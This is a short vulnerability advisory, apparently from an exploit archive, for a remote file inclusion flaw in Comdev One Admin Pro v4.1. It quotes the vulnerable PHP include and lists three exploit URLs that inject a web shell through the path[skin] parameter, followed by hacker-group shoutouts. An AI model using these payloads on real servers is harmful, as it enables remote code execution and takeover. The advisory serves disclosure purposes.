Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include

2006.11.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################## # # Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include # ############################################################## # Found by : AG-Spider # C0ntAct : AG-Spider [at] msn [dot] com # Affected Software : One Admin Pro.v4.1 # Download Script : http://www.conovo.de/script/OneAdminPro.v4.1.zip ############################################################### # # <? include($path["docroot"].$path["skin"]. # ############################################################## # # Exploit :- # # http://www.$ite.com/adminfoot.php?path[skin]=[Spider Shell]? # http://www.$ite.com/adminhead.php?path[skin]=[Spider Shell]? # http://www.$ite.com/adminlogin.php?path[skin]=[Spider Shell]? # ############################################################# # # # Shoutz : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <> CRASH_OVER_RIDE <> # SwEEt-deVil <> Young Hacker # # Arab Security Team ############################################################# _________________________________________________________________ Windows Live? Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top